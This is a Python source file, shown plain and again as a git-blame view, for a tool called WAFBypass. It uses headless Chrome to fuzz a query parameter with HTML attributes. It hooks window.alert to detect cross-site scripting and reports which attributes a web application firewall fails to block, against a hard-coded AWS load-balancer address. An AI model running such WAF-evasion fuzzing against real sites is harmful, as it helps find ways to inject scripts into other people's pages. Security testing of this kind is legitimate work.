xzzuf/xzzuf.py

from urllib.parse import unquote
import selenium
import time
from selenium import webdriver
from selenium.webdriver.support.ui import WebDriverWait
from urllib.parse import urlparse
from urllib.parse import urlencode

from tags import Attributes

# WAFBypass class


class WAFBypass():
    code = "window.alert_trigger = false;window.alert = function() {window.alert_trigger = true;}"

    def __init__(self, url) -> None:
        self.options = webdriver.ChromeOptions()
        self.options.add_argument('--no-sandbox')
        self.options.add_argument('--headless')
        self.driver = webdriver.Chrome(options=self.options)
        self.url = urlparse(url)

        if not self.check_connection():
            raise Exception("Connection Error")

        self.driver.execute_cdp_cmd(
            "Page.addScriptToEvaluateOnNewDocument", {"source": self.code})

    def check_connection(self):
        try:
            self.driver.get(self.url.geturl())
            return True
        except:
            return False

    def wait_for_pageload(self):
        try:
            WebDriverWait(self.driver, 4).until(
                lambda driver: driver.execute_script("return document.readyState") == "complete")
        except TimeoutError:
            raise Exception("Page Load Error")

    def get_page_title(self):
        return self.driver.title

    @property
    def is_403(self):
        return self.driver.title == "403 Forbidden"

    @property
    def triggered_xss(self):
        return self.driver.execute_script("return window.alert_trigger")

    def navigate(self, url):
        self.driver.get(url)
        self.wait_for_pageload()

        is403 = False

        if self.is_403:
            is403 = True
        else:
            is403 = False

        triggerxss = self.triggered_xss

        return (is403, triggerxss)

    def run_fuzz(self):
        try:
            for attr in Attributes:
                # print(f"[*] Testing {attr.name} attribute {attr}")
                encoded = urlencode({"param2": f"{attr}"})
                url = f"{self.url.scheme}://{self.url.netloc}/?{encoded}"
                # print(url)
                is403, trigger = self.navigate(url)
                if not is403:
                    print(f"[+] {attr.name} attribute is not filtered")
        except KeyboardInterrupt:
            self.driver.close()
            exit(0)


w = WAFBypass("http://aws-wafbypass-lb-311079289.eu-south-1.elb.amazonaws.com")
w.run_fuzz()
poc 2023-10-24 14:47:11 +00:00			`from urllib.parse import unquote`
			`import selenium`
			`import time`
			`from selenium import webdriver`
			`from selenium.webdriver.support.ui import WebDriverWait`
			`from urllib.parse import urlparse`
			`from urllib.parse import urlencode`

added some stuff 2023-10-24 15:49:07 +00:00			`from tags import Attributes`

aggiunto il commento da PEP8 2023-10-24 14:59:55 +00:00			`# WAFBypass class`
added some stuff 2023-10-24 15:49:07 +00:00

poc 2023-10-24 14:47:11 +00:00			`class WAFBypass():`
			`code = "window.alert_trigger = false;window.alert = function() {window.alert_trigger = true;}"`

			`def __init__(self, url) -> None:`
			`self.options = webdriver.ChromeOptions()`
			`self.options.add_argument('--no-sandbox')`
			`self.options.add_argument('--headless')`
			`self.driver = webdriver.Chrome(options=self.options)`
			`self.url = urlparse(url)`

			`if not self.check_connection():`
			`raise Exception("Connection Error")`

			`self.driver.execute_cdp_cmd(`
			`"Page.addScriptToEvaluateOnNewDocument", {"source": self.code})`

			`def check_connection(self):`
			`try:`
			`self.driver.get(self.url.geturl())`
			`return True`
			`except:`
			`return False`

			`def wait_for_pageload(self):`
			`try:`
			`WebDriverWait(self.driver, 4).until(`
			`lambda driver: driver.execute_script("return document.readyState") == "complete")`
			`except TimeoutError:`
			`raise Exception("Page Load Error")`

			`def get_page_title(self):`
			`return self.driver.title`

			`@property`
			`def is_403(self):`
			`return self.driver.title == "403 Forbidden"`

			`@property`
			`def triggered_xss(self):`
			`return self.driver.execute_script("return window.alert_trigger")`

			`def navigate(self, url):`
			`self.driver.get(url)`
			`self.wait_for_pageload()`

added some stuff 2023-10-24 15:49:07 +00:00			`is403 = False`
poc 2023-10-24 14:47:11 +00:00
			`if self.is_403:`
added some stuff 2023-10-24 15:49:07 +00:00			`is403 = True`
poc 2023-10-24 14:47:11 +00:00			`else:`
added some stuff 2023-10-24 15:49:07 +00:00			`is403 = False`
poc 2023-10-24 14:47:11 +00:00
added some stuff 2023-10-24 15:49:07 +00:00			`triggerxss = self.triggered_xss`
poc 2023-10-24 14:47:11 +00:00
added some stuff 2023-10-24 15:49:07 +00:00			`return (is403, triggerxss)`
poc 2023-10-24 14:47:11 +00:00
			`def run_fuzz(self):`
			`try:`
added some stuff 2023-10-24 15:49:07 +00:00			`for attr in Attributes:`
			`# print(f"[*] Testing {attr.name} attribute {attr}")`
			`encoded = urlencode({"param2": f"{attr}"})`
			`url = f"{self.url.scheme}://{self.url.netloc}/?{encoded}"`
			`# print(url)`
			`is403, trigger = self.navigate(url)`
			`if not is403:`
			`print(f"[+] {attr.name} attribute is not filtered")`
poc 2023-10-24 14:47:11 +00:00			`except KeyboardInterrupt:`
			`self.driver.close()`
			`exit(0)`


			`w = WAFBypass("http://aws-wafbypass-lb-311079289.eu-south-1.elb.amazonaws.com")`
			`w.run_fuzz()`